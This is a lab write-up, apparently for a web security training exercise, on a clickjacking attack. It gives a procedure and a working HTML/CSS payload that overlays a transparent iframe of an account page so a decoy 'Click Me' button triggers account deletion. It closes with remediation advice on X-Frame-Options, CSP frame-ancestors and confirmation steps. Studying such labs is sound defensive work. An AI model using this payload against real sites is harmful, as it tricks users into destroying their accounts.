SCENARIO

The application possesses a vulnerability in its login functionality and a delete account button protected by a CSRF token. We will try to craft some HTML that frames the account page and fools the user into deleting their account by clicking on a decoy website’s button.

**PROCEDURE**

1. Open the application and login using the credentials provided to act as a target.
2. Now, as we studied in the article, we will try to craft a malicious HTML with some CSS which will come over the actual page and position itself onto the **Delete Account** button and will blur the original content.
3. Due to which the user will think that this is one of the steps of accessing their account and which will cause the user to click the malicious text appearing as a button and below it will be the account deletion button.
4. Go to the exploit server and paste the payload into the body tag of the exploit and click store and view the exploit in order to see if it’s working correctly.
5. At the end, deliver the exploit to the target.

**PAYLOAD**

<style>

iframe {

position:relative;

width:1000px;

height: 800px;

opacity: .01;

z-index: 2;

}

div {

position:absolute;

top:515px;

left:60px;

z-index: 1;

background-color: blue;

}

</style>

<div>Click Me</div>

<iframe src="https://0a990043041728bf84ab8d5400cd00aa.web-security-academy.net/my-account"></iframe>

**REMEDIATION**

1. **Same Origin Policy (SOP) Implementation:** Use the X-Frame-Options: DENY or X-Frame-Options: SAMEORIGIN HTTP header to prevent the site from being embedded in an iframe on foreign origins, effectively thwarting clickjacking attacks.
2. **Content Security Policy (CSP) Deployment:** Adopt a Content Security Policy (CSP) with the frame-ancestors directive. This specifies which sources can embed the application, offering a modern alternative to defend against iframe misuse.
3. **User Confirmation for Critical Actions:** Introduce a multi-step confirmation process for vital actions like account deletion. This could be a popup asking users to re-enter their password, ensuring they are genuinely intending to perform the action.